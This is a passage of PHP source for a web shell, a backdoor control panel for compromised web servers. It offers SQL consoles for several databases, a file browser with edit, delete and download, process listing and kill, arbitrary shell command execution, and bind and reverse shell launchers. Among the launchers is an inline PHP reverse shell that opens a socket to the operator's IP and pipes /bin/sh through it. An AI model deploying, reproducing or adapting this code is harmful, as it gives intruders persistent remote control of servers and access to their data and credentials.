											<textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
						<p><input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
						&nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
						</form>";
				echo "<div>".$q_result."</div>";
				if($con) odbc_close($con);
			}
			else{
				if(isset($_REQUEST['pdocon'])){
					try{
						$mypdo = new PDO($pdodsn,$pdouser,$pdopass);		
						if(isset($_REQUEST['sqlcode'])){
							$sqls = ss($_REQUEST['sqlcode']);
							$querys = explode(";",$sqls);
	
							foreach($querys as $query){
								if(trim($query) != ""){
	
									if($hasil = $mypdo->query($query)){
										$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
										<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
										<table class=\"explore\" style=\"width:99%;\"><tr>";
											$r = $hasil->fetch(PDO::FETCH_ASSOC);
										$savefirstrow = array();
										foreach($r as $fn=>$fv){
											$q_result .= "<th>".htmlspecialchars($fn)."</th>";
											$savefirstrow[] = $fv;
										}
										$q_result .= "</tr><tr>";
										foreach($savefirstrow as $fv){
											$q_result .= "<td>".htmlspecialchars($fv)."</td>";
										}
										$q_result .= "</tr>";
										while($rows = $hasil->fetch(PDO::FETCH_ASSOC)){
											$q_result .= "<tr>";
											foreach($rows as $r)
											{
												if($r == "") $dataz = " ";
												else $dataz = $r;
												$q_result .= "<td>".htmlspecialchars($dataz)."</td>";
											}
											$q_result .= "</tr>";
										}	
										$q_result .= "</table>";	
									}
									else{
	
										$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
												<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
									}
	
									$q_result .= "</table>";
								}
							}
						}		
						else $sqls = "";
					
						echo "	<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
							<input type=\"hidden\" name=\"pdodsn\" value=\"".$pdodsn."\" />
							<input type=\"hidden\" name=\"pdouser\" value=\"".$pdouser."\" />
							<input type=\"hidden\" name=\"pdopass\" value=\"".$pdopass."\" />
													<textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
							<p><input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
							&nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
							</form>";
							echo "<div>".$q_result."</div>";				
					}	
					catch (PDOException $uck) {
						die();
					}			
				}
				else{
					echo "<div class=\"box\"><h2>connect to MySQL</h2>
					<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
					<label>Host</label><input type=\"text\" name=\"sqlhost1\" value=\"".$sqlhost1."\" /><br/>
					<label>Username</label><input type=\"text\" name=\"sqluser1\" value=\"".$sqluser1."\" /><br/>
					<label>Password</label><input type=\"password\" name=\"sqlpass1\" value=\"\" /><br/>
					<label>Port (optional)</label><input type=\"text\" name=\"sqlport1\" value=\"".$sqlport1."\" /><br/>
					<span class=\"rside\"><input type=\"submit\" name=\"mysqlcon\" value=\"Connect !\"/></span>
					</form>
					</div>";
					echo "<div class=\"box\"><h2>connect to MsSQL</h2>
					<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
					<table class=\"boxtbl\">
					<tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost2\" value=\"".$sqlhost2."\" /></td></tr>
					<tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser2\" value=\"".$sqluser2."\" /></td></tr>
					<tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass2\" value=\"\" /></td></tr>
					<tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"".$sqlport2."\" /></td></tr>
					</table>
					<input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
					</form>
					</div>";
	
					echo "<div class=\"box\"><h2>connect to PostgreSQL</h2>
					<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
					<table class=\"boxtbl\">
					<tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost3\" value=\"".$sqlhost3."\" /></td></tr>
					<tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser3\" value=\"".$sqluser3."\" /></td></tr>
					<tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass3\" value=\"\" /></td></tr>
					<tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"".$sqlport3."\" /></td></tr>
					</table>
					<input type=\"submit\" name=\"pgsqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
									</form>
					</div>";
	
					echo "<div class=\"box\"><h2>connect to Oracle</h2>
					<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
					<table class=\"boxtbl\">
					<tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost4\" value=\"".$sqlhost4."\" /></td></tr>
					<tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser4\" value=\"".$sqluser4."\" /></td></tr>
					<tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass4\" value=\"\" /></td></tr>
					<tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport4\" value=\"".$sqlport4."\" /></td></tr>
					</table>
					<input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
									</form>
					</div>";
							
					echo "<div class=\"box\"><h2>connect using ODBC</h2>
					<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
					<table class=\"boxtbl\">
					<tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcdsn\" value=\"".$odbcdsn."\" /></td></tr>
					<tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcuser\" value=\"".$odbcuser."\" /></td></tr>
					<tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"odbcpass\" value=\"\" /></td></tr>
					</table>
					<input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
									</form>
					</div>";
							
					echo "<div class=\"box\"><h2>connect using PDO</h2>
					<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
					<table class=\"boxtbl\">
					<tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdodsn\" value=\"".$pdodsn."\" /></td></tr>
					<tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdouser\" value=\"".$pdouser."\" /></td></tr>
					<tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"pdopass\" value=\"\" /></td></tr>
					</table>
					<input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
									</form>
					</div>";
				}
			}
			echo $s_result;
		}else
		if(isset($_REQUEST['rs'])){
			global $s_server_ip;
			$rshost = $s_server_ip;
			$rstarget = "";
			$d = $pwd;
			if(isset($_REQUEST['d'])) $d = ss($_REQUEST['d']);
	
			$rsport = "13123";
			$rspesan = "Press &#39; Go ! &#39; button and run &#39; nc <i>server_ip</i> <i>port</i> &#39; on your computer";
			$rspesanb = "Run &#39; nc -l -v -p <i>port</i> &#39; on your computer and press &#39; Go ! &#39; button";
			
			if(isset($_REQUEST['xbind'])){
				if(isset($_REQUEST['port'])) $rsport = ss($_REQUEST['port']);
				$rstarget = $rsport;
				if($_REQUEST['xbind']=='pl')
					$rsres = rs($s_win, cp($d), "xbind_pl" ,$xbind_pl, $rstarget);
				if($_REQUEST['xbind']=='py')
					$rsres = rs($s_win, cp($d), "xbind_py" ,$xmulti_py, $rstarget);
				if($_REQUEST['xbind']=='bin'){
					if(!$s_win) $rsres = rs($s_win, cp($d), "xbind_bin" ,$xbind_c, $rstarget);
					else $rsres = rs($s_win, cp($d), "xbind_bin" ,$wmulti_c, $rstarget);
				}
				echo $rsres;
			}
	
			$rstarget = $s_my_ip;
			
			if(isset($_REQUEST['xback'])){
				if(isset($_REQUEST['port'])) $rsport = ss($_REQUEST['port']);
				if(isset($_REQUEST['rstarget'])) $rstarget = ss($_REQUEST['rstarget']);
				
				if($_REQUEST['xback']=='pl'){
					$rstarget = $rsport." ".$rstarget;
					$rsres = rs($s_win, cp($d), "xback_pl" ,$xback_pl, $rstarget);
				}
				
				if($_REQUEST['xback']=='py'){
					$rstarget = $rsport." ".$rstarget;
					$rsres = rs($s_win, cp($d), "xback_py" ,$xmulti_py, $rstarget);
				}
				
				if($_REQUEST['xback']=='bin'){
					if(!$s_win) $rsres = rs($s_win, cp($d), "xback_bin" ,$xback_c, $rstarget);
					else $rsres = rs($s_win, cp($d), "xback_bin" ,$wmulti_c, $rstarget);
				}
				
				if($_REQUEST['xback']=='php'){
					$ip = $rstarget;
					$port = $rsport;
					$chunk_size = 1337;
					$write_a = null;
					$error_a = null;
					$shell = '/bin/sh';
					$daemon = 0;
					$debug = 0;
					if(function_exists('pcntl_fork')){
						$pid = pcntl_fork();
						if ($pid == -1) exit(1);
						if ($pid) exit(0);
						if (posix_setsid() == -1) exit(1);
						$daemon = 1;
					}
					umask(0);
					$sock = fsockopen($ip, $port, $errno, $errstr, 30);
					if(!$sock) exit(1);
					$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
					$process = proc_open($shell, $descriptorspec, $pipes);
					if(!is_resource($process)) exit(1);
					stream_set_blocking($pipes[0], 0);
					stream_set_blocking($pipes[1], 0);
					stream_set_blocking($pipes[2], 0);
					stream_set_blocking($sock, 0);
					while(1){
						if(feof($sock)) break;
						if(feof($pipes[1])) break;
						$read_a = array($sock, $pipes[1], $pipes[2]);
						$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
						if(in_array($sock, $read_a)){
							$input = fread($sock, $chunk_size);
							fwrite($pipes[0], $input);
						}
						if(in_array($pipes[1], $read_a)){
							$input = fread($pipes[1], $chunk_size);
							fwrite($sock, $input);
						}
						if(in_array($pipes[2], $read_a)){
							$input = fread($pipes[2], $chunk_size);
							fwrite($sock, $input);
						}
					}
					fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);
					proc_close($process);
					$rsres = " ";
				}
					
				echo $rsres;
			}
			?><div class="box"><h2>Bind shell</h2>
			<form action="<?php echo $_SERVER['PHP_SELF']; ?>?rs" method="post" />
			<label>Server IP</label><input disabled="disabled" type="text" name="rshost" value="<?php echo $rshost; ?>" /><br/>
			<label>Port</label><input type="text" name="port" value="<?php echo $rsport; ?>" /><br/>
			<label>Using</label><select name="xbind">
				<option value="pl">Perl</option>
				<option value="py">Python</option>
				<option value="bin">bin</option>
			</select>
			<span class="rside">
			<em><?php echo $rspesan; ?></em> <input type="submit" value="Go !"/>
			</span>
			</form>
			</div>			
			<div class="box"><h2>Reverse shell</h2>
			<form action="<?php echo $_SERVER['PHP_SELF']; ?>?rs" method="post" />
			<label>Your IP</label><input type="text" name="rstarget" value="<?php echo $rstarget; ?>" /><br/>
			<label>Port</label><input type="text" name="port" value="<?php echo $rsport; ?>" /><br/>
			<label>Using</label><select name="xback">
				<option value="pl">Perl</option>
				<option value="py">Python</option>
				<option value="bin">bin</option>
				<option value="php">PHP</option>
			</select>
			<span class="rside">
			<em><?php echo $rspesanb; ?></em> <input type="submit" value="Go !"/>
			</span>
			</form>
			</div><?php
		}else
		if(isset($_REQUEST['view'])){
			$f = ss($_REQUEST['view']);
			if(isset($fnew) && (trim($fnew)!="")) $f = $fnew; 
	
			if(is_file($f)){
				if(!$s_win && $s_posix){
					$name = posix_getpwuid(fileowner($f));
					$group = posix_getgrgid(filegroup($f));
					$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
				}
				else {
					$owner = $s_user;
				}
				$filn = basename($f);
				echo "<table>
				<tr><td style=\"width:140px;\">Filename</td><td><span id=\"".cs($filn)."_link\">".$f."</span>
				<form action=\"" . $_SERVER['PHP_SELF'] . "?d=".$pwd."&amp;view=".$f."\" method=\"post\" id=\"".cs($filn)."_form\" class=\"hide\" style=\"margin:0;padding:0;\">
					<input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
					<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
					<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
					<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
					onclick=\"swap('".cs($filn)."_link','".cs($filn)."_form');\" />
				</form>
				</td></tr>
				<tr><td>Size</td><td>".gs($f)."</td></tr>
				<tr><td>Permission</td><td>".gp($f)."</td></tr>
				<tr><td>Owner</td><td>".$owner."</td></tr>
				<tr><td>Create time</td><td>".date("d-M-Y H:i",filectime($f))."</td></tr>
				<tr><td>Last modified</td><td>".date("d-M-Y H:i",filemtime($f))."</td></tr>
				<tr><td>Last accessed</td><td>".date("d-M-Y H:i",fileatime($f))."</td></tr>
				<tr><td>Actions</td><td>
				<a href=\"?edit=".$f."\">edit</a> |
				<a href=\"javascript:swap('".cs($filn)."_link','".cs($filn)."_form');\">rename</a> |
				<a href=\"?delete=".$f."\">delete</a> |
				<a href=\"?dl=".$f."\">download</a>&nbsp;(<a href=\"?dlgzip=$f\">gzip</a>)</td></tr>
				<tr><td>View</td><td>
				<a href=\"?view=".$f."&amp;type=text\">text</a> |
				<a href=\"?view=".$f."&amp;type=code\">code</a> |
				<a href=\"?view=".$f."&amp;type=image\">image</a></td></tr>
				</table>
				";
				$t = "";
				$iinfo = getimagesize($f);
				if(substr($filn,-3,3) == "php") $t = "code";
				if(is_array($iinfo)) $t = 'image';
	
				if(isset($_REQUEST['type'])) $t = ss($_REQUEST['type']);
	
				if($t=="image"){
					$width = (int) $iinfo[0];
					$height = (int) $iinfo[1];
					$imginfo = "Image type = ( ".$iinfo['mime']." )<br />
						Image Size = <span class=\"gaul\">( </span>".$width." x ".$height."<span class=\"gaul\"> )</span><br />";
					if($width > 660){
						$width = 660;
						$imglink = "<p><a href=\"?img=".$pwd.$filn."\" target=\"_blank\">
						<span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
					}
					else $imglink = "";
	
					echo "<div class=\"viewfilecontent\" style=\"text-align:center;\">".$imglink."
						<img width=\"".$width."\" src=\"?img=".$pwd.$filn."\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
	
				}
				elseif($t=="code"){
					echo "<div class=\"code\">";
					$file = wordwrap(file_get_contents($f),160,"\n",true);
					$buff = highlight_string($file,true);
					echo $buff;
					echo "</div>";
				}
				else {
					echo "<div class=\"code\">";
					echo nl2br(htmlentities(wordwrap(file_get_contents($f),160,"\n",true)));
					echo  "</div>";
				}
			}
			elseif(is_dir($f)){
				chdir($f);
				$pwd = cp(getcwd());
				$_SESSION['dir']=$pwd;
				echo showdir($pwd,$s_prompt,$s_win);
			}
			echo $s_result;
		}elseif(isset($_REQUEST['edit'])){
			$f = ss($_REQUEST['edit']);
			$fc = "";
			$fcs = "";
	
			if(is_file($f))	$fc = file_get_contents($f);
			if(isset($_REQUEST['fcsubmit'])){
				$fc = ssc($_REQUEST['fc']);
				if($filez = fopen($f,"w")){
					$time = date("d-M-Y H:i",time());
					if(fwrite($filez,$fc)) $fcs = "file saved <strong>@</strong> ".$time;
					else $fcs = "failed to save";
					fclose($filez);
				}
				else $fcs = "permission denied";
			}
			?><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
					<textarea id="fc" name="fc" class="code"><?php echo htmlspecialchars($fc); ?></textarea>
					<input type="text" name="edit" value="<?php echo $f; ?>" /><br>
					<?php echo $fcs; ?><span class="rside" ><input type="submit" name="fcsubmit" value="Save !"/></span>
				</form>
			<?php
		}elseif(isset($_REQUEST['new'])){
			$path = ss($_REQUEST['new']);
			$f = $path.file_newname($path,'newfile.php');
			$fc = "";
			$fcs = "";
			?><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
					<textarea id="fc" name="fc" class="code"><?php echo htmlspecialchars($fc); ?></textarea>
					<input type="text" name="edit" value="<?php echo $f; ?>" /><br>
					<?php echo $fcs; ?><span class="rside" ><input type="submit" name="fcsubmit" value="Save !"/></span>
				</form>
			<?php
		}else
		if(isset($_REQUEST['ps'])){
			if(!$s_win) $h = "ps -aux";
			else $h = "tasklist /V /FO csv";
			$wcount = 11;
			$wexplode = " ";
			if($s_win) $wexplode = "\",\"";
	
	
			$res = exe($h);
			if(trim($res)=='') echo "<p class=\"rs_result\">error: permission denied</p>";
			else{
				echo "<table class=\"sortable\">";
				if(!$s_win) $res = preg_replace('#\ +#',' ',$res);
	
				$psarr = explode("\n",$res);
				$fi = true;
				$tblcount = 0;
	
				$check = explode($wexplode,$psarr[0]);
				$wcount = count($check);
	
				foreach($psarr as $psa){
					if(trim($psa)!=''){
						if($fi){
							$fi = false;
							$psln = explode($wexplode,$psa,$wcount);
							echo "<tr><th>action</th>";
							foreach($psln as $p){
								echo "<th>".trim(trim(strtolower($p)),"\"")."</th>";
							}
							echo "</tr>";
						}
						else{
							$psln = explode($wexplode,$psa,$wcount);
							echo "<tr>";
							$tblcount = 0;
							foreach($psln as $p){
								if(trim($p)=="") $p = "&nbsp;";
								if($tblcount == 0){
									echo "<td style=\"text-align:center;\"><a href=\"?ps&amp;d=".$pwd."&amp;pid=".trim(trim($psln[1]),"\"")."\">kill</a></td>
											<td style=\"text-align:center;\">".trim(trim($p),"\"")."</td>";
									$tblcount++;
								}
								else{
									$tblcount++;
									if($tblcount == count($psln)) echo "<td style=\"text-align:left;\">".trim(trim($p), "\"")."</td>";
									else echo "<td style=\"text-align:center;\">".trim(trim($p), "\"")."</td>";
								}
							}
							echo "</tr>";
						}
					}
				}
				echo "</table>";
			}
		}else
		if(isset($_REQUEST['cmd'])){
			$cmd = ss($_REQUEST['cmd']);
			if(strlen($cmd) > 0){
				if(preg_match('#^cd(\ )+(.*)$#',$cmd,$r)){
					$nd = trim($r[2]);
					if(is_dir($nd)){
						chdir($nd);
						$pwd = cp(getcwd());
						$_SESSION['dir']=$pwd;
						echo showdir($pwd,$s_prompt,$s_win);
					}
					elseif(is_dir($pwd.$nd)){
						chdir($pwd.$nd);
						$pwd = cp(getcwd());
						$_SESSION['dir']=$pwd;
						echo showdir($pwd,$s_prompt,$s_win);
					}
					else echo "<pre>".$nd." is not a directory"."</pre>";
				}
				else{
					$s_r = htmlspecialchars(exe($cmd));
					if($s_r != '') echo "<pre>".$s_r."</pre>";
					else echo showdir($pwd,$s_prompt,$s_win);
				}
			}
			else {
				echo showdir($pwd,$s_prompt,$s_win);
			}			
		}else {
			echo showdir($pwd,$s_prompt,$s_win);
		}
	}

	function info(){
		global $s_software,$s_system,$s_id,$s_server_ip,$s_my_ip,$s_safemode,$pwd,$letters,$CONFIG;
		?><div class=top>
		<?php echo $s_software; ?><strong> | </strong><a href="?phpinfo" target="_blank" title="Information about current state of PHP">PHP/<?php echo phpversion(); ?></a><br/>
		<?php echo $s_system; ?><br/>
		<?php if($s_id != ""){ ?><tr><td><?php echo $s_id; ?><br/><?php } ?>
		server ip : <?php echo $s_server_ip; ?><strong> | </strong>your  ip : <?php echo $s_my_ip; ?><strong> | </strong>
		safemode <strong><?php echo ($s_safemode?'ON':'OFF'); ?></strong>
		<strong> | </strong> Time @ Server : <?php echo date("d M Y H:i:s",time()); ?><br/>
		<noscript><strong>You have Javascript disabled. Please enable it !!</strong><br/></noscript>
		<?php if(strlen(trim($CONFIG['PASS']))==0){ ?><strong>You haven't set Password !! </strong><br/><?php }	?>
		</div>
		<div class="bottom" style="height:25px">
			<strong><?php echo trim($letters); ?></strong>
			<a href="?dh"><img class=iconmenu height="16px" width="16px" src="<?php echo $_SERVER['PHP_SELF'] ; ?>?icon=home" alt="Home"/></a>
			<span id="chpwd">
				<a href="javascript:swap('chpwd','chpwdform')">
					<img class=iconmenu height="16px" width="16px" src="<?php echo $_SERVER['PHP_SELF'] ; ?>?icon=pencil" alt="Change"/>	
				</a>&nbsp;&nbsp;&nbsp;
				<?php echo swd($pwd); ?>
			</span>
			<span class="hide" id="chpwdform">
				<form style="display:inline" action="<?php echo  $_SERVER['PHP_SELF'] ; ?>" method="post">
					<a href="javascript:swap('chpwdform','chpwd');">
						<img class=iconmenu height="16px" width="16px" src="<?php echo  $_SERVER['PHP_SELF'] ; ?>?icon=pencil" alt="Change"/>
					</a>&nbsp;&nbsp;&nbsp;
					<input id="chpwd_" type="text" name="d" value="<?php echo $pwd; ?>" />
					<input type="submit" name="submit" value="view file / folder" />
				</form>
			</span>
		</div>
		<?php
	}	
	$s_menu = array(
		'exp' => array('File Explorer','Explorer'),
		'info' => array('Server Information','Info'),
		'ps' => array('Display process status','Process'),
		'eval' => array('PHP eval function','Eval'),
		'db' => array('Connect to database','Database'),
		'rs' => array('Remote Shell','Remote'),
		'proxy' => array('Web Proxy','Proxy'),
		'scan' => array('Network Scanner','Scan'),
		'calc' => array('Code Convertor','Convert'),
		'tools' => array('Usefull Tools','Tools')
	);
	
	$s_hidden = array(
		'cmd' => array('Shell Command','Shell'),
		'edit' => array('Edit File','Edit'),
		'new' => array('Create New File','New'),
		'view' => array('View File','View'),
		'upload' => array('Upload File','Upload')
	);
	
	if(count(array_intersect_key($_REQUEST,$s_menu+$s_hidden))==0)$_REQUEST['exp'] = true;
		
}
?><!DOCTYPE HTML>
<html>
<head>
	<title><?php echo $s_title; ?></title>
	<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
	<link rel="SHORTCUT ICON" href="?icon=favicon" />
	<link rel="stylesheet" type="text/css" href="<?php echo $_SERVER['PHP_SELF']?>?css" />
	<script type="text/javascript" src="<?php echo $_SERVER['PHP_SELF']?>?js=sortable"></script>
	<script type="text/javascript">
		function swap(l,b){
			if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
			if(document.getElementById(b)) document.getElementById(b).style.display = 'inline';
			if(document.getElementById(l + '_')) document.getElementById(l + '_').focus();
		}
		
		function init(){
			<?php if(isset($_REQUEST['cmd'])){ ?>if(document.getElementById('cmd')) document.getElementById('cmd').focus();<?php } ; ?>		
		}

		
	</script>
</head>

<body onLoad="init();">
	<div class="main">
		<div class="header">
			<div class="left">
				<h1 class=name><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><?php echo $CONFIG['NAME']; ?></a></h1><span class="sub"><?php echo $CONFIG['SUBNAME']; ?></span>
			</div>
			<div class="right">
				<?php info() ; ?>
			</div>
		</div>
		<div class="body">
			<div class="left">
				<ul class="menu">
					<?php foreach($s_hidden as $key => $menu)if(isset($_REQUEST[$key])){ ; ?><li title="<?php echo $menu[0]; ?>"class="selected"><span><?php echo $menu[1]; ?></span></li>
					<li class="space"></li><?php }; ?>
					<?php foreach($s_menu as $key => $menu){ ; ?><li title="<?php echo $menu[0]; ?>" <?php if(isset($_REQUEST[$key])){ ?>class="selected"<?php } ; ?>><?php if(!isset($_REQUEST[$key])){ ?><a href="<?php echo $_SERVER['PHP_SELF']."?".$key; ?>"><?php }else { ?><span><?php }; ?><?php echo $menu[1]; ?><?php if(!isset($_REQUEST[$key])){ ?></a><?php } else { ?></span><?php }; ?></li>
					<?php } ; ?><?php if(strlen(trim($CONFIG['PASS']))>0) { ?><li class="space"></li>
					<li class="logout" title="Quit from <?php echo $CONFIG['NAME']; ?>"><a href="<?php echo $_SERVER['PHP_SELF']; ?>?logout" >Logout</a></li><?php } ; ?>
					
				</ul>
			</div>
			<div class="right">
				<div class="top">
					<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
						<span class="prompt"><?php echo $s_prompt; ?></span>
						<input id="cmd" name="cmd" type="text" class="prompt" placeholder='- shell command -'>
						<noscript><input type="submit" value="Go !" class="button" /></noscript>
					</form>			
				</div>
				<div class="bottom scroll">
					<?php result(); ?>
				</div>
			</div>
		</div>
		<div class="footer">
			<div class="copyright">
				<?php $time_end = microtime(true);$time = $time_end - $time_start;echo 'Script took '.$time.' seconds to execute';?><br/>
				<?php echo $CONFIG['NAME']." ".$CONFIG['VER']; ?> &copy; <?php echo date("Y",time()); ?> mastito | studio<br/>
				<a href="http://facebook.com/benedictus.arya">facebook</a> - <a href="http://twitter.com/mastito_cabi">twitter</a>
			</div>
		</div>
	</div>
</body>
</html>
<?php exit;
